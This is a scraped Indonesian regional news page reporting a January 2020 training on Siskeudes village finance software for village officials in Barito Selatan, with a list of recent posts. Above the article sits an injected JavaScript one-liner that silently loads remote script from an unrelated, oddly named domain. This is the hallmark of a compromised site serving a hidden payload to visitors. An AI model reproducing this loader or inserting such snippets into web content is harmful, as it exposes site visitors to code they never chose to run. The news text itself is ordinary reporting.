(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');

Kades dan Aparatur Desa se Barsel Ikuti Bimtek Siskeudes


KANALKALIMANTAN.COM, BUNTOK – Seluruh Kepala Desa (Kades) dan aparatur desa se Barito Selatan (Barsel) mengikuti pelaksanaan Bimbingan Teknik (Bimtek) pengelolaan keuangan desa berbasis aplikasi Sistem Keungan Desa (Siskeudes), di aula Neo Palangka Raya, sejak Rabu (15-17/1/2020).

Pihak penyelenggara Dir LDP Institut Palangka Raya Kokoh Pri Utomo mengatakan, pelaksanaan Bimtek berbasis aplikasi Siskeudes ini untuk meningkatkan perencanaan dan peningkatan proses penganggaran dalam penganggaran untuk pembangunan tiap desa.

“Kita ingin tiap desa dapat membuat anggaran pembangunan tiap desanya lebih baik lagi lewat Bimtek yang berbasis aplikasi Siskeudes ini,” kata Kokoh kepada Kanalkalimantan.com, usai pembukaan.

Adapun materi yang diberikan LDP sendiri hingga pihak BPKP diantaranya tentang penyusunan RPJMDes, RKPDes hingga bisa menjadi APBDes. Dimana tiap anggaran tersebut akan diinput melalui aplikasi Siskeudes tersebut.

“Jika kita akan berikan materi kepada pihak desa bagaimana menyusun anggaran yang lebih baik lagi dan sesuai dengan aturan yang berlaku, sehingga kedepannya tidak menimbulkan masalah,” jelas Kokoh.

Di tempat yang sama perwakikan BPKP Kalteng, Kordinator Pengawasan Bidang Akuntabilitas Pemerintah Daerah Jusuf Partono mengatakan, dengan dilaksanakan Bimtek pengelolaan dana desa ini kiranya bisa memahami bagaimana pengelolaan dana desa baik dengan penyusunan anggaran hingga sampai pertanggunjawabannya nanti.

“Kita harapkan tiap kepala desa yang ada di Barsel bisa memahami dalam setiap penyusunan anggaran dana desa, baik dalam penyaluran hingga sampai laporan pertanggungjawabannya,” pinta Jusuf.

Sementara itu Plt Kepala Dinas DSPMD Barsel Haitami mengharapkan, kepada seluruh desa yang ada di Barsel dengan menggunakan pengelolaan keuangan desa melalui Siskeudes terbaru ini bisa memberikan pemahaman mereka dalam pengelolaan bisa lebih baik lagi.

“Kita berharap tiap desa lewat Siskeudes yang terbaru ini bisa memberikan pemahaman dalam pengelolaan keuangan desa lebih baik,” ujar Haitami.

Ditambahkan olehnya lewat Siskeudes ini desa bisa terhindar dari adanya penyimpangan terhadap pengelolaan dana desa. Karena adanya kekurangan dalam pemahaman pengelolaan dan pelaporan akan berdampak pada hukum.

“Kita berharap lewat Siskeudes yang baru ini pihak desa bisa paham terkait penyusunan dan pelaporan sehingga proses penyaluran dana desa bisa berjalan lancar dan bisa terhindar pula dari penyimpangan hukum,” pungkas Haitami.(kanalkalimantan.com/digdo)

Reporter : Digdo
Editor : Bie


Desy Arfianty

Recent Posts

“Embroidery Mini Class” Perayaan Hari Kartini di Lingkungan PLN UIP3B Kalimantan

KANALKALIMANTAN.COM, BANJARBARU - Memperingati Hari Kartini 2024 PT PLN (Persero) Unit Induk Penyaluran dan Pusat… Read More

8 jam ago

Sejarah Hari Tari Sedunia 29 April

KANALKALIMANTAN.COM – Setiap tanggal 29 April diperingati salah satu seni atau ekspresi diri yang tertua… Read More

10 jam ago

Peringati Hari Tari Sedunia, Ratusan Penari Tampil di Taman Budaya Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Unit Pelaksana Teknis Daerah (UPTD) Taman Budaya Provinsi Kalimantan Selatan (Kalsel) menyelenggarakan… Read More

11 jam ago

Rakerda KNPI Banjarbaru, Rekomendasi Pendirian Gedung Pemuda

KANALKALIMANTAN.COM, BANJARBARU - Dewan Pengurus Daerah (DPD) Komite Nasional Pemuda Indonesia (KNPI) Kota Banjarbaru menggelar… Read More

12 jam ago

Peringati Hari Kartini, PLN Beri Santunan 30 Muslimah Tangguh di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Semangat memperingati Hari Kartini 2024, PT PLN (Persero) Unit Induk Penyaluran dan… Read More

14 jam ago

Konser Malam Pestaforia Kapuas 2024

KANALKALIMANTAN.COM, KUALA KAPUAS – “Konser Malam Pestaforia Kapuas 2024” menyemarakan Hari Jadi ke-218 Kota Kuala… Read More

16 jam ago

This website uses cookies.